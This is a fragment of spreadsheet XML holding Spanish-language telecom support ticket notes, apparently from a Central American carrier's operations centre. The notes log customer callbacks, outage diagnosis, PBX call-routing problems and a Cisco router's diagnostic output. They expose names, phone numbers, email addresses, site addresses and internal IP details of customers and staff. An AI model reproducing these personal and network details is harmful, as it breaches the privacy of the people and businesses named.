    <t>**SE LLAMA A CLIENTE DANIEL RODRIGUEZ  AL 70527029 INDICA QUE YA NO ESTA EN LA OFICINA E INDICA QUE NO PUEDE REALIZAR PRUEBAS YA QUE LOS EQUIPOS ESTAN DEMASIADO ALTO Y NO TIENE ESCALERA PARA SUBIR A REINICIAR EQUIPOS O HACER LAS PRUEBAS EL DIA LUNES 6 SE PRESENTO UN TEC Y NO HIZO MAYOR COSA CL INDICA QUE SE LE LLAME CUANDO YA SE LE TENGA UNA SOLUCION O EL TEC YA VAYA EN CAMINO PORQUE SE LE LLAMA 5 VECES AL DIA Y NO SE LE SOLUCIONA EL PROBLEMA **
ID 1001861415
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL RODRIGUEZ 70527029 NO RESPONDE, ENVIA A BUZON ||
SE INTENTAR LUEGO**
-ID 1001733071
**</t>
  </si>
  <si>
    <t>F4592775</t>
  </si>
  <si>
    <t>SE LKLAMA A NUMERO 52092623, ENVIA DIRECTO A BUZON
ID
3001168062
COLA:
NOMBRE: A: 52092623
NÚMERO: 55280199
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 14/06/2022 15:15:48</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO SOLICITANDO ACCESOS PARA VISITA MAÑANA MIERCOLES 8:00 HRS || PENDIENTE CONFIRMACIÓN
ASUNTO: VISITA TÉCNICA AGENCIA_0073 || ID: 8900477T || UBICACIÓN AGE.73.- 4 CALLE Y 5 AVENIDA ZONA 1 LOCAL 0. AGUACATAN INTERIOR CENTRO COMERCIAL FLORISMA
¿
MICROSOFT OUTLOOK
MAR 14/06/2022 17:47
NO SE PUDO ENTREGAR A ESTOS DESTINATARIOS O GRUPOS: JOSE.JUAREZM@CLARO.COM.GT EL BUZÓN DE CORREO DEL DESTINATARIO ESTÁ LLENO Y NO PUEDE ACEPTAR MENSAJES POR EL MOMENTO. TRATA DE VOLVER A ENVIAR ESTE MENSAJE MÁS TARDE O PONTE EN CONTACTO CON EL DESTINATARIO
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS BANRURAL.
EN SEGUIMIENTO AL SERVICIO AGENCIA_0073 || ID: 8900477T || UBICACIÓN AGE.73.- 4 CALLE Y 5 AVENIDA ZONA 1 LOCAL 0. AGUACATAN INTERIOR CENTRO COMERCIAL FLORISMA. LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE EL SERVICIO ALARMADO POR LO QUE ES NECESARIO UNA VISITA TÉCNICA, SOLICITANOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA NUESTRO PERSONAL TÉCNICO QUE ATENDERA VISITA EL DÍA DE MAÑANA MIÉRCOLES 15/06 A PARTIR DE LAS 8:00 HRS.</t>
  </si>
  <si>
    <t>SE VALIDAN CONEXIONES CON APOYO DE JOSE, AETHRA Y CISCO ENERGIZADOS, SE DESCONECTA Y CONECTA CABLE DE RED PERO NO LOGRA RESTABLECER, SE ACUERDA VISITA PARA REVISION DE EQUIPO E INTEGRIDAD FISICA DE CABLE DE RED.
ID
3001188299
COLA:
NOMBRE: A: 45338704
NÚMERO: 45338704
DURACIÓN: 0:07:37
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 45338704
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 14/06/2022 16:23:01</t>
  </si>
  <si>
    <t>SUBGERENTE DE AGENCIA SOLICITA QUE SE DEUELVA LA LLAMADA EN UNOS 40 A 60 MINUTOS, QUE EN ESTE MOMENTO ESTA CONTANDO EFECTIVO Y NO PUEDE DEJAR ASI, SE PRCEDERA.
ID
3001168614
COLA:
NOMBRE: A: 52095097
NÚMERO: 52095097
DURACIÓN: 0:02:20
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 52095097
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 14/06/2022 15:18:49</t>
  </si>
  <si>
    <t>F4592778</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 26807671 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001717430</t>
  </si>
  <si>
    <t>F4592779</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25069510 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001869069</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONA QUE YA OBSERVA EL SERVICIO OPERATIVO PERO SOLICITA LLAMADA PARA LAS 17:00 HRS
-ID 1001771342</t>
  </si>
  <si>
    <t>F4592783</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE DARWIN CHAVARRIA 78516218 MENCIONA QUE YA APLICARON REINICIO PERO EL SERVICIO NO RESTABLECE
-ID 1001719048
NOMBRE DEL CLIENTE: CALLEJA S.A. DE C.V.
UBICACIÓN: CARRETERA PANAMERICANA CC EL ENCUENTRO EL SITIO, SAN MIGUEL
CONTACTO EN SITIO: ENCARGADO DE TURNO
HORARIO DE ATENCION:HASTA LAS 22:00 HRS
GESTIÓN DE PERMISOS: MENCIONA QUE LA ACOMETIDA ES INDEPENDIENTE, NO SE NECESITAN PERMISOS CON EL CC
*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARWIN CHAVARRIA AL 7851-6218 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001835130
**</t>
  </si>
  <si>
    <t>F4592793</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE PEDRO GARCIA, INDICA QUE YA APLICARON REINICIO A LOS EQUIPOS, INDICA QUE NO LEVANTA, POR LO QUE SE PROCEDE A REALIZAR DESCARTES EN ULTIMA MILLA Y CLIENTE PROPORCINA LOS SIGUIENTES DATOS.
HORARIO: 24 HORAS
PERMISOS: NO
UBICACION: 1RA. CALLE 4-99 ZONA 1, BARRIO LA DEMOCRACIA, JALAPA.
CONTACTO : PEDRO GARCIA 58261406 / MELVIN RODRIGUEZ   58261900
NÚMERO: 58261406
FIN: HOY, 09:23
ID DE LLAMADA: 1001707398</t>
  </si>
  <si>
    <t>F4592795</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE  CESAR HIGUEROS QUIEN SOLICITA CORREO CON LAS PRUEBAS PERO EL DIA DE MAÑANA ESTARÁ DANDO SEGUIMIENTO YA QUE NO ESTA EN SITIO PARA REVISAR CONFIGURACIÓN DE LA PBX.
1001753774
COLA:
NOMBRE: A: 47397654
NÚMERO: 47397654
DURACIÓN: 0:08:22
ESTADO: CONECTADA
DETALLES: 47397654
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 11:28:46</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE Y SE QUEDA EN ESPERA DE SU RESPUESTA EL DIA DE MAÑANA 08/06, YA QUE HOY NO ESTA EN SITIO PARA REVISAR SU PBX.
CASO: SD1132827 /// TELECOMUNICA S.A. /// GDN: 6664-5800
ESVIN ANTONIO PAREDES SAMUY
ESTIMADO CLIENTE CON RESPECTO DEL CASO:
TELECOMUNICA S.A.
GDN: 6664-5800
SE PERCIBIÓ EL PROBLEMA  QUE COMENTO DE NO COMPLETAR LAS LLAMADAS HACIA EL GDN TAMBIÉN CON EL NUMERO 22245383 EL CUAL SE USO DE PRUEBA PARA TOMAR LOS TRAZADOS Y SE USO EL MÓVIL 59517022 PARA VALIDAR LLAMADAS QUE SI COMPLETA,  DETECTANDO LO SIGUIENTE:
INVITE DE LLAMADA QUE COMPLETA
INVITE DE LLAMADA QUE NO COMPLETA
EL RECHAZO DE LA LLAMADA QUE NO COMPLETA ESTA PROVENIENTE DE LA IP DE  SU PBX
LA ÚNICA DIFERENCIA QUE NOTAMOS ENTRE UNA Y OTRA LLAMADA ES EN EL TO YA QUE UNA LLAMADA LLEGA CON EL +502 Y OTRA SIN EL +502 (LLAMADA QUE NO COMPLETA), SOLICITAMOS PUEDA VALIDAR EN SU PBX LA REGLA QUE PUDIERA TENER CON RESPECTO DE ESTE PREFIJO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE TIENE CORREO DEL CLIENTE, SE QUEDA A LA ESPERA DE SU RESPUESTA CON RESPECTO DE LAS PRUEBAS QUE REALIZARÁ
CESAR HIGUEROS &lt;CESAR@INSTACOM.GT&gt;
GRACIAS ESVIN HAGO PRUEBAS Y LE CUENTO
SALUDIS
CESAR</t>
  </si>
  <si>
    <t>-* SE TIENE RESPUESTA DE CLIENTE, INDICA QUE YA AGREGO UNA RUTA DE ENTRADA, SE SOLICITA APOYO A PERSONAL DE A.E.
RE: CASO: SD1132827 /// TELECOMUNICA S.A. /// GDN: 6664-5800</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE CESAR HIGUEROS QUIEN INDICA QUE  NO PUEDE RECIBIR LLAMADAS DE LOS NUMEROS DE CASA:
77614924
66324607
TAMBIEN SE PROBO DESDE LA LINEA VI-VO
22245383
Y TAMPOCO COMPLETA
SE PROBO DESDE LA LINEA DE CIC DE CNOC Y SI COMPLETA, TAMBIEN DESDE UNA LINEA DE CASA 22218259 Y COMPLETA. TAMBIEN DESDE MOVILES COMPLETA SIN PROBLEMA, SON SOLO ESOS RANGOS DE NUMERACIÓN. SE PROCEDE A ESCALAR CON CX
1001730585
COLA:
NOMBRE: A: 47397654
NÚMERO: 47397654
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 47397654
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 10:19:10</t>
  </si>
  <si>
    <t>F4592804</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ING EDGAR MUSMAL 30481583 SOLICITA SE LLAME A  INMER RAMIREZ - 30280477
-ID 1001726727</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INMER RAMIREZ - 30280477 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001811995 - 1001812189</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INMER RAMIREZ - 30280477  MENCIONA QUE PRESENTARON PROBLEMA DE ENERGIA PERO EL SERVICIO YA ESTA FUNCIONANDO BIEN PERO TIENEN PROBLEMA CON UN FIREWALL (EQUIPO INTERNO) POR LO QUE SOLICITA SE LLAME A LAS 14:00 HRS
-ID 1001727386</t>
  </si>
  <si>
    <t>F4592805</t>
  </si>
  <si>
    <t>CLIENTE NEHEMIAS RIOS 30268181 VALIDA QUE EL E1 YA SE ENCUENTRA FUNCIONANDO, INDICA QUE ENCONTRÓ EL EQUIPO AETHRA DESCONECTADO, LUEGO DE CONECTARLO SERVICIO RESTABLECE. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4592808</t>
  </si>
  <si>
    <t>F4592811</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE DULCE CIJAS 51855822 CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
1001779379
COLA:
NOMBRE: A: 51855822
NÚMERO: 51855822
ESTADO: MARCANDO
DURACIÓN: 0:00:02
DETALLES: 51855822
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 12:33:54</t>
  </si>
  <si>
    <t>F4592815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONEL URBINA-52039279   SE TIENE A LICENTEE ENL INEAN ## COMENTA QUE APERTURO TICKET POR QUE CUANDO DIGITABA EL ULTIMO NUMERO PARA LLAMAR, SE TARDABA EN SACAR LLAMADAS ### CLIENTE REALIZA PRUEBAS Y TODO OK ### VALIDA CIERRE##
1001713724
COLA:
NOMBRE: A: 52039279
NÚMERO: 011 50252039279
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: +50252039279
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 09:32:11</t>
  </si>
  <si>
    <t>F4592819</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 10:52
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI COYOL ID: CONTR0001398216OC
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4592820</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO CABRERA 42111939 MENCIONA QUE ESTA PRESENTANDO PERDIDAS DE PAQUETES, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE CORTA LA LLAMDA
-ID 1001742982</t>
  </si>
  <si>
    <t>F4592828</t>
  </si>
  <si>
    <t>CLIENTE CARLOS JOSE LOPEZ INDICA QUE NO TIENE AUDIO EN SUS LLAMADAS, YA REVISO SU PBX Y SOLICITA CERTIFICACIÓN EL DIA DE MAÑANA 08/06 A LAS 9:00, AL MOMENTO QUE EL TECNICO ESTE EN SITIO EL COMPARTIRA  LAS CREDENCIALES, EN TODAS LAS LLAMADAS NO ESTA TENIENDO AUDIO. SE DEBE CERTIFICAR SI ES PROBLEMA DE CLARO.
1001859576
COLA:
NOMBRE: A: 0050361612470
NÚMERO: 0050361612470
DURACIÓN: 0:11:17
ESTADO: CONECTADA
DETALLES: 0050361612470
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 17:06:12</t>
  </si>
  <si>
    <t>SE LLAMA AL OTRO CONTACTO CARLOS LOPEZ +503 61612470, INDICA QUE SE COMUNICARÁ CON KEVIN NORIEGA, SE LE BRINDA EL CONTACTO PARA QUE NOS LLAME DE VUELTA. ID: 1001795288</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 503 61612470 PARA SEGUIMIENTO, NO CONTESTA; EL PR 45996519 TAMPOCO LO HACE; SE DEBE INTENTAR MÁS TARDE. NO HAY HISTORIAL DE TICKET PARA ESTE CLIENTE, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4592829</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GUSTAVO MAZARIEGOS 30718040  CONFIRMA QUE YA TIENE SERVICIO, SE PROCEDE AL CIERRE DEL TICKET</t>
  </si>
  <si>
    <t>F4592835</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODOLFO VALLECILLO  50577203817 MENCIONA QUE NO LOGRO CONTACTAR A SU IT POR LO QUE SOLICITA QUE PERSONAL DE CLARO LLEGUE A PR Y REALICE SU DIAGNOSTICO DEL PROBLEMA
-ID 1001854839
NOMBRE DEL CLIENTE: LATINETWORK DICHTER &amp; NEIRA GUATEMALA, S.A.
UBICACIÓN:EUROPLAZA, TORRE 1 NIVEL 18, OFICINA 1801
CONTACTO EN SITIO: ALIDA MARTINEZ
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. RODOLFO VALLECILLO SE LE SOLICITO ENVIAR A SU TECNICO QUIEN INFORMA DEL PROBLEMA, PERO NO ACCEDE NO QUIERE INCURRIR EN MAS GASTOS, ELLOS YA TIENEN SU DIAGNOSTICO POR TAL MOTIVO SOLICITAN VISITA TECNICA...</t>
  </si>
  <si>
    <t>TÉCNICO EN PR INDICA QUE NO HAY ENERGÍA ELÉCTRICA EN CLIENTE; ADICIONAL SE LLAMÓ A RODOLFO VALLECILLO/CLIENTE 50577203817 Y SE LE BRINDAN AVANCES DEL TICKET.
ÉSTE INDICA ENLACE OK, ASEGURA QUE HAY INDUCCIÓN DE ENERGÍA, INDICA QUE EL CABLE QUE VA DE NUESTRO ROUTER A SU EQUIPO MERAKI.</t>
  </si>
  <si>
    <t>F4592836</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LESTER /87704872 MENCIONA QUE AUN PERSISTE EL INCONVENIENTE, NO CUENTAN CON SALIDDA A INTERNET, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001753209</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO  88785034 INFORMA QUE YA ESTA EN SITIO PROCEDE A INSTALAR SUS EQUIPOS Y REALIZAR PRUEBAS ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO  88785034 INFORMA QUE SE DIFICULTO CON SEGUIR LOS REPUESTOS, PERO YA LOS TIENE VA EN RUTA HACIA EL PUNTO REMOTO, SOLICITA LLAMAR EN 40 MIS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO 87337879 INFORMA QUE ESTA REALIZANDO PRUEBAS, SE LE INFORMA QUE SU LAN NO ESTA ASOCIADA AL ROUTER CISCO DE CLARO:
CONFIG DEL CPE:
DATOS_MINED_DELEGACION_DI#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P - OVERRIDES FROM PFR
GATEWAY OF LAST RESORT IS 10.15.96.1 TO NETWORK 0.0.0.0
S*    0.0.0.0/0 [1/0] VIA 10.15.96.1
      10.0.0.0/8 IS VARIABLY SUBNETTED, 2 SUBNETS, 2 MASKS
C        10.15.96.0/27 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
L        10.15.96.7/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
      172.16.0.0/16 IS VARIABLY SUBNETTED, 2 SUBNETS, 2 MASKS
C        172.16.25.0/24 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
L        172.16.25.1/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
DATOS_MINED_DELEGACION_DI# SH IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.15.96.7      YES NVRAM  UP                    UP
GIGABITETHERNET0/1         172.16.25.1     YES NVRAM  UP                    UP
DATOS_MINED_DELEGACION_DI#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN CLARO
GI0/1                          UP             UP       LAN CLIENTE
DATOS_MINED_DELEGACION_DI#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.15.96.1             10   5087.895D.5745  ARPA   GIGABITETHERNET0/0
INTERNET  10.15.96.7              -   780C.F0B0.4020  ARPA   GIGABITETHERNET0/0
INTERNET  172.16.25.1             -   780C.F0B0.4021  ARPA   GIGABITETHERNET0/1
DATOS_MINED_DELEGACION_DI#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0         0         0         0         0
* GIGABITETHERNET0/1            0         0         0         0      1000         0         0         0         0
DATOS_MINED_DELEGACION_DI#SH LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 42 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 42 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 45 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.055: %SMART_LIC-6-AGENT_READY: SMART AGENT FOR LICENSING IS INITIALIZED
*JAN  2 00:00:02.387: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JUN  8 15:30:25.619: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*JUN  8 15:30:39.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  8 15:30:39.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:30:40.163: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*JUN  8 15:30:40.163: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:30:42.331: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUN  8 15:30:43.303: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUN  8 15:30:44.319: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*JUN  8 15:31:22.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  8 15:31:33.039: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:31:34.039: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:32:00.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  8 15:32:38.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MINED_DELEGACION_DI-CONFG) FAILED
*JUN  8 15:33:08.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  8 15:33:16.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MI.CFG) FAILED
*JUN  8 15:33:16.967: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.6(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2016 BY CISCO SYSTEMS, INC.
COMPILED FRI 08-JUL-16 07:43 BY PROD_REL_TEAM
*JUN  8 15:33:16.967: %SNMP-5-COLDSTART: SNMP AGENT ON HOST DATOS_MINED_DELEGACION_DI IS UNDERGOING A COLD START
*JUN  8 15:33:17.587: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:33:18.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:33:46.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  8 15:33:59.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:34:00.031: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:34:25.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MINED_DELEGACION_DI-CONFG) FAILED
*JUN  8 15:35:03.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MI.CFG) FAILED
*JUN  8 15:35:24.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  8 15:36:02.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  8 15:36:41.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MINED_DELEGACION_DI-CONFG) FAILED
*JUN  8 15:37:19.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MI.CFG) FAILED
*JUN  8 15:38:10.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  8 15:38:48.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  8 15:39:27.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MINED_DELEGACION_DI-CONFG) FAILED
*JUN  8 15:40:05.623: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MI.CFG) FAILED
*JUN  8 15:41:26.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN  8 15:42:04.967: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN  8 15:42:43.723: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MINED_DELEGACION_DI-CONFG) FAILED
*JUN  8 15:43:04.031: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:43:05.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*JUN  8 15:43:10.031: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:43:11.031: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*JUN  8 15:43:21.723: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/DATOS_MI.CFG) FAILED
DATOS_MINED_DELEGACION_DI#SH CLOCK
*15:43:28.287 UTC WED JUN 8 2022
DATOS_MINED_DELEGACION_DI#SH VER
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.6(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2016 BY CISCO SYSTEMS, INC.
COMPILED FRI 08-JUL-16 07:43 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
DATOS_MINED_DELEGACION_DI UPTIME IS 13 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C19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225L3A7
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245448K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
